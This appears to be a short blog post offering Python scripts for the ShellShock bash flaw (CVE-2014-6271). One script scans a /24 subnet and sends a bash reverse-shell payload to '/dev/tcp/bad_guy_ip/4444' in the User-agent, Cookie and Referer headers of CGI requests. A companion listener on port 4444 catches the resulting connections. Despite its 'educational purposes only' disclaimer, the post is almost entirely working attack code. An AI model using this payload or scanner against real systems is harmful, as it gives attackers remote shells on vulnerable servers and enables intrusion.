ShellShock /bin/bash vulnerability CVE-2014-6271 /24 CGI Exploitability Test Suite

Do you know what to do with this below ?

 

# ShellShock Bash Vulnerability CVE-2014-6271 Test Tool #
# This has been coded by Emanuele 'ac1d' De Lucia for educational purposes only #
# The author is NOT responsible for any harmful use you decide to make #
# Coded 25/09/2014 01.55. Online 25/09/2014 02.30 CET #
# yabba dabba doooooo, Wilma !!! Where's my club ?!?! #
# Please, turn on your brain before to continue.... #
# nc -l -p 4444 may be useful but...take a look at the bottom :) #
import re
import urllib2
import time
IP = '192.168.1.'
for i in range(0,255):
 try:
  req = urllib2.Request('http://'+IP+str(i)+'/cgi-bin/status')
  # yeeeeeeee yaaaaaaaa /bin/bash reverse #
  req.add_header('User-agent', '() { :; }; /bin/bash -i >& /dev/tcp/bad_guy_ip/4444 0>&1')
  req.add_header('Cookie', '() { :; }; /bin/bash -i >& /dev/tcp/bad_guy_ip/4444 0>&1')
  req.add_header('Referer', '() { :;}; /bin/bash -i >& /dev/tcp/bad_guy_ip/4444 0>&1')
  res = urllib2.urlopen(req)
  html = res.read()
  print IP+str(i)+' '+'req: sent'
  time.sleep(1)
 except:
  print IP+str(i)+' '+'req: error'

 

to keep trace of incoming connections:

 

# Very simple python multithreaded server by Emanuele De Lucia#
import socket, threading, time

def handle(s):
  print "Connection from: "+str(s.getpeername())
  s.close

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 4444));
s.listen(1);
while 1:
  t,_ = s.accept();
  threading.Thread(target = handle, args = (t,)).start()

 

Leave a Reply

Your email address will not be published. Required fields are marked *


+ 5 = 9